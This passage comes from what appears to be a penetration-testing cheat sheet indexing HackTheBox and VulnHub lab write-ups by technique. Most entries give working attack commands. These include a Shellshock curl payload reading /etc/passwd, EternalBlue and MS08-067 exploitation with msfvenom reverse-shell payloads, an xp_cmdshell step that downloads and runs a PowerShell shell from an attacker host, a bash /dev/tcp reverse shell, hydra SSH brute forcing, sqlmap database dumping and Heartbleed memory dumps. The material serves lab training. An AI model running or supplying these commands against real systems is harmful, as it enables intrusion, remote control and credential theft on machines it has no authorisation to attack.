[`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell --- <a name="exploit_shellshock"></a> #### exploit_shellshock [⇡](#exploit) ```shell curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://www.hackthebox.eu/home/machines/profile/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://zayotic.com/posts/oscp-reference/ [+] https://highon.coffee/blog/shellshock-pen-testers-lab-walkthrough/ [+] https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ --- <a name="exploit_smb_ms08_067"></a> #### exploit_smb_ms08_067 [⇡](#exploit) (netapi exploit) for microsoft windows xp systems with open smb ports, use the [ms08-067](https://github.com/andyacer/ms08_067) metasploit module [`windows/smb/ms08_067_netapi`]() ```shell scan: nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <targetip> msfcli auxiliary/scanner/smb/ms08_067_check rhosts=<targetip> threads=100 E manual_a: wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows nc -nlvp <attackerport> python ms08_067_2018.py <targetip> <osid> <targetport> manual_b: searchsploit ms08-067 python /usr/share/exploitdb/platforms/windows/remote/7132.py <targetip> 1 msf: use exploit/windows/smb/ms08_067_netapi set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf) | [htb#2](https://www.hackthebox.eu/home/machines/profile/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100" /> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | [+] https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067 [+] https://github.com/andyacer/ms08_067 [+] https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py [+] https://blog.rapid7.com/2014/02/03/new-ms08-067/ [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html --- <a name="exploit_smb_ms17_010"></a> #### exploit_smb_ms17_010 [⇡](#exploit) (eternalblue exploit) for microsoft windows system with smb v1 enbaled, use the metasploit exploit `windows/smb/ms17_010_eternalblue` ```shell nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <targetip> manual: wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe nc -nlvp <attackerport> python send_and_execute.py <targetip> revshell.exe msf: use exploit/windows/smb/ms17_010_eternalblue set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf) | [htb#51](https://www.hackthebox.eu/home/machines/profile/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100" /> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [+] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 [+] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html [+] https://github.com/helviojunior/MS17-010/send_and_execute.py --- <a name="exploit_smb_nullsession"></a> #### exploit_smb_nullsession [⇡](#exploit) smb null sessions leak a lot of sensitive information about the target system. it could be useful to access open shares or to get sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_smb_usermap"></a> #### exploit_smb_usermap [⇡](#exploit) samba 3.0.0 - 3.0.25rc3 is vulnerable to remote command execution ```shell nc -nlvp <attackerport> sudo apt install python python-pip pip install --user pysmb git clone https://github.com/amriunix/CVE-2007-2447.git cd CVE-2007-2447/ python usermap_script.py <targetip> 139 <attackerip> <attackerport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf) | [htb#1](https://www.hackthebox.eu/home/machines/profile/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100" /> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | [+] https://nvd.nist.gov/vuln/detail/CVE-2007-2447 [+] https://github.com/amriunix/CVE-2007-2447 --- <a name="exploit_smb_web_root"></a> #### exploit_smb_web_root [⇡](#exploit) smb shared directory is mapped to the web server's root directory. read files to obtain sensitive information or upload a reverse shell file native to the web server and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_sql_login"></a> #### exploit_sql_login [⇡](#exploit) login to the target system using a sql service account ```shell mssqlclient.py -windows-auth "<username>@<targetip>" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sql_xpcmdshell"></a> #### exploit_sql_xpcmdshell [⇡](#exploit) use the SQL xp_cmdshell method to gain command execution on the target system ```shell SELECT IS_SRVROLEMEMBER('sysadmin') ## check if current sql user has db sysadmin role, continue if true EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" type shell.ps1 ## create a powershell reverse shell xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attackerip>/shell.ps1\");" python3 -m http.server 80 ## serve the reverse shell via http ufw allow from <targetip> proto tcp to any port 80,<attackerport> ## allow incoming connection from <targetip> nc -nlvp <attackerport> ## listen for incoming reverse shell connection ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sqli"></a> #### exploit_sqli [⇡](#exploit) target system is running a webapp that's vulnerable to sql injection ```shell sqlmap -u "http://<targetip>:<targetport>/<vulnwebapp>/index.php" --batch --forms --dump ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://www.hackthebox.eu/home/machines/profile/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 3. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 4. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_ssh_authorizedkeys"></a> #### exploit_ssh_authorizedkeys [⇡](#exploit) if we have access to a user's `.ssh` directory, copy our `id_rsa.pub` file to `.ssh/authorized_keys` to obtain passwordless ssh access | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="exploit_ssh_bruteforce"></a> #### exploit_ssh_bruteforce [⇡](#exploit) use hydra to bruteforce ssh password for a know user ```shell hydra -l anne -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 ssh://<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_ssh_privatekeys"></a> #### exploit_ssh_privatekeys [⇡](#exploit) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="exploit_ssl_heartbleed"></a> #### exploit_ssl_heartbleed [⇡](#exploit) use nmap nse script to confirm heartbleed vulnerability and then sensepost exploit to dump memory from target system ```shell nmap --script=ssl-heartbleed -p <targetport> <targetip> python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` [+] https://github.com/sensepost/heartbleed-poc --- <a name="exploit_wordpress_defaultcreds"></a> #### exploit_wordpress_defaultcreds [⇡](#exploit) target system has wordpress configured with default credentials `admin/admin` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="exploit_wordpress_plugin"></a> #### exploit_wordpress_plugin [⇡](#exploit) certain wordpress installations might have a `/plugins/` directory that could provide source files or leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_plugin_activitymonitor"></a> #### exploit_wordpress_plugin_activitymonitor [⇡](#exploit) wordpress plugin `Plainview Activity Monitor` is vulnerable to remote command injection | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | [+] https://www.exploit-db.com/exploits/45274 --- <a name="exploit_wordpress_plugin_hellodolly"></a> #### exploit_wordpress_plugin_hellodolly [⇡](#exploit) wordpress plugin `Hello Dolly` (default on stock wp installs) file `hello.php` is modified with php reverse shell code to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_template"></a> #### exploit_wordpress_template [⇡](#exploit) edit a wordpress template file, like `404.php` and add php reverse shell code within it to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc"></a> ### ⚙️ PrivEsc [🡑](#ttps) <a name="privesc_anansi"></a> #### privesc_anansi [⇡](#privesc) the `anansi_util` application has `sudo` privileges. use it to run manual commands and upon error run `!/bin/bash` to execute root shell ```shell sudo /home/anansi/bin/anansi_util manual cat /etc/shadow - (press RETURN) !/bin/bash ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_bash_reverseshell"></a> #### privesc_bash_reverseshell [⇡](#privesc) bash reverse shell command ```shell bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="privesc_bof"></a> #### privesc_bof [⇡](#privesc) craft exploit for the buffer overflow vulnerability to gain elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | --- <a name="privesc_chkrootkit"></a> #### privesc_chkrootkit [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | --- <a name="privesc_credsreuse"></a> #### privesc_credsreuse [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="privesc_cron"></a> #### privesc_cron [⇡](#privesc) leverage cronjobs to modify and execute `root` owned files ```shell crontab -l cat /etc/crontab ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://www.hackthebox.eu/home/machines/profile/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | 